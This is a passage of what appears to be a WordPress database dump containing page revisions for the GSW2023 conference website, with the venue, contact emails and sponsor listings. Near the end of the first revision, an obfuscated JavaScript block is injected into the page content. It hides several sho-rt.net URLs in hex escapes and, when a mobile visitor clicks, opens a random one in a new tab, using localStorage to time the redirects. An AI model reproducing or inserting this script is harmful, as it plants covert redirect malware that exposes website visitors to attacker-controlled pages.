image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-08-08 15:27:40','2023-08-08 15:27:40','',3066,'https://gsw2023.com/?p=5087',0,'revision','',0),
(5088,1,'2023-08-08 15:28:17','2023-08-08 15:28:17','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219449581{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689081933017{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.tra.gov.eg/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5009 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/ntra-300x116.jpg\" alt=\"\" width=\"300\" height=\"116\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689081968974{margin-top: 95px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689081337215{margin-top: 40px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689080719428{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p>&nbsp;[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689081395417{margin-top: 10px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://abuqir.net/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5005\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/aboquir-239x300.png\" alt=\"\" width=\"193\" height=\"242\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690460056235{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: 